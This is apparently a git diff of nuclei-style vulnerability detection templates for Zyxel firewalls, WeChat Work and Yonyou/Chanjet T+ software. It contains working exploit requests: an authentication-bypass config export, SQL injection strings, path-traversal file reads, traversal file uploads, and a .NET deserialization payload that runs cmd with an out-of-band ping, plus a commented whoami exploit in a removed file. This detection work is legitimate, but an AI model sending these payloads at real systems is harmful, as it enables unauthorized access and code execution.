 create mode 100755 http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml
 create mode 100755 http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml
 delete mode 100644 http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml
 create mode 100644 http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml
 rename http/vulnerabilities/yonyou/{yonyou-chanjet-tplus-ufida-sqli.yaml => chanjet-tplus-ufida-sqli.yaml} (62%)
 rename http/vulnerabilities/yonyou/{yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml => grp-u8-uploadfiledata-fileupload.yaml} (55%)
 delete mode 100755 http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml
 delete mode 100755 http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml
 rename http/vulnerabilities/yonyou/{yonyou-nc-accept-arbitrary-file-upload.yaml => yonyou-nc-accept-fileupload.yaml} (67%)
 rename http/vulnerabilities/yonyou/{yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml => yonyou-nc-baseapp-deserialization.yaml} (66%)
 rename http/vulnerabilities/yonyou/{yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml => yonyou-nc-dispatcher-fileupload.yaml} (73%)
 delete mode 100755 http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml
 create mode 100755 http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml
 rename http/vulnerabilities/yonyou/{yonyou-nc-grouptemplet-file-upload.yaml => yonyou-nc-grouptemplet-fileupload.yaml} (66%)
 delete mode 100644 http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml
 create mode 100644 http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml
 delete mode 100644 http/vulnerabilities/zyxel/CVE-2022-0342.yaml

diff --git a/http/vulnerabilities/yonyou/yonyou-nc-bshservlet-full-check.yaml b/http/cnvd/2021/CNVD-2021-30167.yaml.yaml
similarity index 100%
rename from http/vulnerabilities/yonyou/yonyou-nc-bshservlet-full-check.yaml
rename to http/cnvd/2021/CNVD-2021-30167.yaml.yaml
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-uapjs-jsinvoke-fileupload.yaml b/http/cnvd/2023/CNVD-C-2023-76801.yaml
similarity index 100%
rename from http/vulnerabilities/yonyou/yonyou-nc-uapjs-jsinvoke-fileupload.yaml
rename to http/cnvd/2023/CNVD-C-2023-76801.yaml
diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml
new file mode 100644
index 0000000000..c4b5ea88a8
--- /dev/null
+++ b/http/cves/2022/CVE-2022-0342.yaml
@@ -0,0 +1,33 @@
+id: CVE-2022-0342
+
+info:
+  name:  Zyxel - Authentication Bypass
+  author: SleepingBag945
+  severity: critical
+  description: |
+     An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.
+  metadata:
+    max-request: 1
+    fofa-query: app="ZyXEL-USG-FLEX"
+    verified: true
+  tags: cve,cve2022,zyxel,auth-bypass
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/export-cgi?category=config&arg0=startup-config.conf"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "interface-name"
+
+      - type: word
+        part: header
+        words:
+          - "text/zyxel"
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/http/vulnerabilities/wechat/wechat-info-leak.yaml b/http/vulnerabilities/wechat/wechat-info-leak.yaml
index eb239576c6..360756423f 100644
--- a/http/vulnerabilities/wechat/wechat-info-leak.yaml
+++ b/http/vulnerabilities/wechat/wechat-info-leak.yaml
@@ -1,20 +1,24 @@
 id: wechat-info-leak
 
 info:
-  name: wechat-info-leak
+  name: WeChat agentinfo  - Information Exposure
   author: SleepingBag945
   severity: high
   description: |
-    企业微信信息泄露
+    There is an information leakage vulnerability in the agentinfo interface of Tencent Enterprise WeChat. An attacker can obtain the Enterprise WeChat Secret through the vulnerability.
+  reference:
+    - https://github.com/Threekiii/Awesome-POC/blob/f7869eb69bad66d177a88df4cebfe584691651ce/%E5%85%B6%E4%BB%96%E6%BC%8F%E6%B4%9E/%E8%85%BE%E8%AE%AF%20%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%20agentinfo%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
   metadata:
-  tags: wechat
+    max-request: 1
+    fofa-query: body="wework_admin.normal_layout"
+    verified: true
+  tags: wechat,exposure,tencent
 
 http:
   - raw:
       - |
         GET /cgi-bin/gateway/agentinfo HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
         Content-Type: application/x-www-form-urlencoded
 
     matchers:
@@ -22,4 +26,4 @@ http:
         dsl:
           - status_code_1 == 200 && contains(body_1,"errcode") && contains(body_1,"strcorpid")
           - contains(body_1,"corpid")
-        condition: and
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-chanjet-remote-gnfunction-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
similarity index 50%
rename from http/vulnerabilities/yonyou/yonyou-chanjet-remote-gnfunction-sqli.yaml
rename to http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
index 1d190ef477..3b30482133 100755
--- a/http/vulnerabilities/yonyou/yonyou-chanjet-remote-gnfunction-sqli.yaml
+++ b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
@@ -1,18 +1,24 @@
-id: yonyou-chanjet-remote-gnfunction-sqli
+id: chanjet-gnremote-sqli
 
 info:
-  name: 畅捷通远程通 GNRemote.dll SQL注入漏洞
+  name:  Changjietong Remote Communication GNRemote.dll - SQL Injection
   author: SleepingBag945
   severity: high
-  description: 畅捷通信息技术股份有限公司是一家致力于为中国小微企业提供以财务及管理服务为核心的平台服务、应用服务、数据增值服务。 畅捷通信息技术股份有限公司畅捷通存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
-  tags: yonyou,changjietong
+  description: |
+    Changjietong Information Technology Co., Ltd. is a company dedicated to providing platform services, application services, and data value-added services with financial and management services as its core to China's small and micro enterprises. Changjietong Information Technology Co., Ltd. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
+  reference: |
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    max-request: 2  
+    fofa-query: body="远程通CHANJET_Remote"
+    verified: true
+  tags: yonyou,chanjet,sqli
 
 http:
   - raw:
       - |
         POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1
         Host: {{Hostname}}
-        Accept: */*
         Content-Type: application/x-www-form-urlencoded
         Accept-Encoding: gzip
 
@@ -21,32 +27,25 @@ http:
       - |
         POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1
         Host: {{Hostname}}
-        Accept: */*
         Content-Type: application/x-www-form-urlencoded
         Accept-Encoding: gzip
 
         username=%22'%20or%201%3d2%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
 
-
-
     matchers-condition: and
     matchers:
       - type: word
+        part: body_1
         words:
           - "{\"RetCode\":0}"
-        part: body_1
         condition: and
 
       - type: word
+        part: body_2
         words:
           - "{\"RetCode\":2}"
-        part: body_2
         condition: and
 
       - type: status
         status:
-          - 200
-
-
-
-# http://wiki.peiqi.tech/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
+          - 200
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml
index c5dcb41470..f3844303d8 100755
--- a/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml
+++ b/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml
@@ -1,13 +1,17 @@
 id: chanjet-tplus-checkmutex-sqli
 
 info:
-  name: chanjettplus - CheckMutex SQL Injection
+  name: Chanjet Tplus CheckMutex - SQL Injection
   author: unknown
-  severity: critical
+  severity: high
   description: |
     There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
   reference:
-    - https://stack.chaitin.com/vuldb/detail?id=f4ae9a80-58c7-4a5c-a463-ae4e40605880
+    - https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%94%A8%E5%8F%8B%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    max-request: 1
+    fofa-query: app="畅捷通-TPlus"
+    verified: true
   tags: chanjettplus,sqli
 
 http:
@@ -19,8 +23,13 @@ http:
         Cookie: ASP.NET_SessionId=; sid=admin
 
         {"accNum": "6'", "functionTag": "SYS0104", "url": ""}
+
     matchers:
       - type: word
+        part: body
         words:
-          - "附近有语法错误"
-        part: body
\ No newline at end of file
+          - "order by begintime"
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml
new file mode 100755
index 0000000000..71089b0995
--- /dev/null
+++ b/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml
@@ -0,0 +1,33 @@
+id: chanjet-tplus-file-read
+
+info:
+  name: Chanjet TPlus DownloadProxy.aspx - Arbitrary File Read
+  author: SleepingBag945
+  severity: high
+  description: |
+    Chanjet TPlus DownloadProxy.aspx file has an arbitrary file reading vulnerability. An attacker can obtain sensitive files on the server through the vulnerability.
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20DownloadProxy.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    max-request: 1
+    fofa-query: app="畅捷通-TPlus"
+    verified: true
+  tags: yonyou,chanjet,lfi,tplus
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "xml version"
+          - ""
+        condition: and
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml
new file mode 100755
index 0000000000..899a90ef99
--- /dev/null
+++ b/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml
@@ -0,0 +1,43 @@
+id: chanjet-tplus-fileupload
+
+info:
+  name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
+  author: SleepingBag945
+  severity: critical
+  description: |
+    There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20Upload.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    max-request: 2
+    fofa-query: app="畅捷通-TPlus"
+    verified: true
+  tags: yonyou,chanjet,upload,intrusive
+
+http:
+  - raw:
+      - |
+        POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo
+        Accept-Encoding: gzip
+
+        ------WebKitFormBoundaryuirnbcvo
+        Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg"
+        Content-Type: image/jpeg
+
+        {{randstr_2}}
+        ------WebKitFormBoundaryuirnbcvo--
+
+      - |
+        GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1==200 && status_code_2==200"
+          - "contains(body_2, '{{randstr_2}}')"
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml
deleted file mode 100644
index 84fa88c270..0000000000
--- a/http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml
+++ /dev/null
@@ -1,67 +0,0 @@
-id: chanjet-tplus-getstorewarehousebystore_rce
-
-info:
-  name: 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞
-  author: SleepingBag945
-  severity: critical
-  description: |
-    用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞
-    https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
-  metadata:
-  tags: yonyou,chanjet
-
-http:
-  - raw:
-      - |
-        POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
-        Host: {{Hostname}}
-        X-Ajaxpro-Method: GetStoreWarehouseByStore
-        
-        {
-          "storeID":{}
-        }
-
-    matchers-condition: or
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "actorId或archivesId不能为空"
-          - "\"Type\":\"System.ArgumentException\""
-        condition: and
-      
-      - type: word
-        part: body
-        words:
-          - "Object reference not set to an instance of an object"
-          - "System.NullReferenceException"
-        condition: and
-
-
-
-
-
-
-# EXP
-# POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
-# Host: 
-# User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
-# Connection: close
-# Content-Length: 668
-# X-Ajaxpro-Method: GetStoreWarehouseByStore
-# Accept-Encoding: gzip
-
-# {
-#   "storeID":{
-#     "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
-#     "MethodName":"Start",
-#     "ObjectInstance":{
-#       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
-#       "StartInfo":{
-#         "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
-#         "FileName":"cmd",
-#         "Arguments":"/c whoami > C:/Progra~2/Chanjet/TPlusStd/WebSite/2RUsL6jgx9sGX4GItQBcVfxarBM.txt"
-#       }
-#     }
-#   }
-# }
diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml
new file mode 100644
index 0000000000..fef9baf76a
--- /dev/null
+++ b/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml
@@ -0,0 +1,53 @@
+id: chanjet-tplus-rce
+
+info:
+  name: Chanjet TPlus GetStoreWarehouseByStore - Remote Command Execution
+  author: SleepingBag945
+  severity: critical
+  description: |
+    Changjet Tplus has a front-end remote code execution vulnerability. An attacker can use the GetStoreWarehouseByStore method to inject a serialized payload and execute arbitrary commands. This ultimately results in leakage of sensitive server information or code execution.
+  reference:
+    - https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
+    - https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    fofa-query: app="畅捷通-TPlus"
+    verified: true
+  tags: chanjettplus,rce
+
+http:
+  - raw:
+      - |
+        POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
+        Host: {{Hostname}}
+        X-Ajaxpro-Method: GetStoreWarehouseByStore
+
+        {
+          "storeID":{
+            "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
+            "MethodName":"Start",
+            "ObjectInstance":{
+            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
+            "StartInfo":{
+              "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
+              "FileName":"cmd",
+              "Arguments":"/c ping {{interactsh-url}}"
+            }
+            }
+          }
+        }
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "actorId或archivesId不能为空"
+          - "\"Type\":\"System.ArgumentException\""
+          - "Object reference not set to an instance of an object"
+          - "System.NullReferenceException"
+        condition: or
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-ufida-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml
similarity index 62%
rename from http/vulnerabilities/yonyou/yonyou-chanjet-tplus-ufida-sqli.yaml
rename to http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml
index 809e9ad420..21525c8bf3 100755
--- a/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-ufida-sqli.yaml
+++ b/http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml
@@ -1,24 +1,29 @@
-id: yonyou-changjietong-tplus-ufida-sqli
+id: chanjet-tplus-ufida-sqli
 
 info:
-  name: 畅捷通 T+ Ufida.T.SM.Login.UIP SQL注入漏洞
+  name: Chanjet TPluse Ufida.T.SM.Login.UIP - SQL injection
   author: SleepingBag945
   severity: high
-  description: 畅捷通信息技术股份有限公司是一家致力于为中国小微企业提供以财务及管理服务为核心的平台服务、应用服务、数据增值服务。 畅捷通信息技术股份有限公司畅捷通存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
-  tags: yonyou,changjietong
+  description: |
+    Chanjet TPluse application has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
+  reference:
+    - https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20Plus%20%E5%AE%A1%E8%AE%A1%20%EF%BC%88%E8%B6%85%E8%AF%A6%E7%BB%86%EF%BC%89.md
+  metadata:
+    max-request: 1
+    fofa-query: app="畅捷通-TPlus"
+    verified: true
+  tags: yonyou,chanjet,sqli
 
 http:
   - raw:
       - |
         POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
         Host: {{Hostname}}
-        Accept: */*
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
         Accept-Encoding: gzip
 
         {"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""}
 
-
     matchers-condition: and
     matchers:
       - type: word
@@ -31,5 +36,4 @@ http:
 
       - type: status
         status:
-          - 200
-
+          - 200
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml
similarity index 55%
rename from http/vulnerabilities/yonyou/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml
rename to http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml
index 756203235b..c04b608af5 100755
--- a/http/vulnerabilities/yonyou/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml
+++ b/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml
@@ -1,20 +1,24 @@
-id: yonyou-erp-u8-uploadfiledata-arbitrary-file-upload
+id: grp-u8-uploadfiledata
 
 info:
-  name: yonyou-erp-u8-uploadfiledata-arbitrary-file-upload
+  name: UFIDA GRP-U8 UploadFileData - Arbitrary File Upload
   author: SleepingBag945
   severity: critical
-  description: 用友U8+ERP客户关系管理软件存在文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。
+  description: |
+    File upload vulnerability in UFIDA U8+ERP customer relationship management software. An attacker can use this vulnerability to gain control of the server.
   reference:
-    - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20UploadFileData%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
-  tags: yonyou,upload
+    - https://mp.weixin.qq.com/s/DZXFxLC7fFKbPUWrdyITag
+  metadata:
+    max-request: 2
+    fofa-query: title="用友GRP-U8行政事业内控管理软件"
+    verified: true
+  tags: yonyou,fileupload,grp,intrusive
 
 http:
   - raw:
       - |
         POST /UploadFileData?action=upload_file&filename=../{{randstr_1}}.jsp HTTP/1.1
-        Host: 60.172.58.9:8010
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
+        Host: {{Hostname}}
         Content-Length: 327
         Accept: */*
         Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqoqnjtcw
@@ -34,18 +38,12 @@ http:
       - |
         GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-        Accept: */*
         Accept-Encoding: gzip
 
-
     req-condition: true
     matchers:
       - type: dsl
         dsl:
           - "status_code_1 == 200 && contains(body_1,'showSucceedMsg')"
           - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
-        condition: and
-
-
-# 可尝试启动并调用xpcmdshell执行命令
\ No newline at end of file
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml
deleted file mode 100755
index ba54daed45..0000000000
--- a/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: yonyou-changjietong-tplus-file-upload
-
-info:
-  name: 畅捷通 T+ 任意文件上传漏洞
-  author: SleepingBag945
-  severity: critical
-  description: 畅捷通 T+ 系列产品存在任意文件上传漏洞,攻击者可利用该漏洞上传恶意文件控制目标服务器。
-  tags: yonyou,changjietong,upload
-
-http:
-  - raw:
-      - |
-        POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
-        Host: {{Hostname}}
-        Accept: */*
-        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo
-        Accept-Encoding: gzip
-
-        ------WebKitFormBoundaryuirnbcvo
-        Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg"
-        Content-Type: image/jpeg
-
-        {{randstr_2}}
-        ------WebKitFormBoundaryuirnbcvo--
-
-      - |
-        GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1
-        Host: {{Hostname}}
-        Accept: */*
-        Accept-Encoding: gzip
-
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - "status_code_1==200"
-          - "status_code_2==200"
-          - "contains(body_2, '{{randstr_2}}')"
-        condition: and
-
diff --git a/http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml b/http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml
deleted file mode 100755
index 6d63bf8eae..0000000000
--- a/http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: yonyou-changjietong-tplus-downloadproxy-file-read
-
-info:
-  name: 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
-  author: SleepingBag945
-  severity: medium
-  description: 用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件
-  tags: yonyou,changjietong
-
-http:
-  - raw:
-      - |
-        GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1
-        Host: {{Hostname}}
-
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "xml version"
-          - ""
-        part: body
-        condition: and
-
-      - type: status
-        status:
-          - 200
-
diff --git a/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml b/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml
index c6cd934f97..6c165c4cea 100755
--- a/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml
@@ -1,34 +1,32 @@
 id: yonyou-fe-directory-traversal
 
 info:
-  name: yonyou-fe-directory-traversal
+  name: FE collaborative Office templateOfTaohong_manager.jsp  - Path Traversal
   author: SleepingBag945
   severity: medium
-  description: 用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞,通过漏洞攻击者可以获取目录文件等信息,导致进一步攻击
+  description: |
+     There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks.
   reference:
-    - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html
-  tags: yonyou
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    max-request: 2
+    fofa-query: "FE协作"
+    verified: true
+  tags: yonyou,fe,lfi
 
 http:
-  - raw:
-      - |
-        GET /system/mediafile/templateOfTaohong_manager.jsp?path=/../../../ HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-        Accept: */*
-        Cookie: JSESSIONID=31DB4A83640B082DBA62A54ADB04D77C
-        Accept-Encoding: gzip
-
-
+  - method: GET
+    path:
+      - "{{BaseURL}}/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
           - "window.location=\"templateOfTaohong_manager.jsp?path=\""
-      - type: word
-        words:
           - "var next=window.confirm(\"确定删除文件吗?\");"
+        condition: and
+
       - type: status
         status:
           - 200
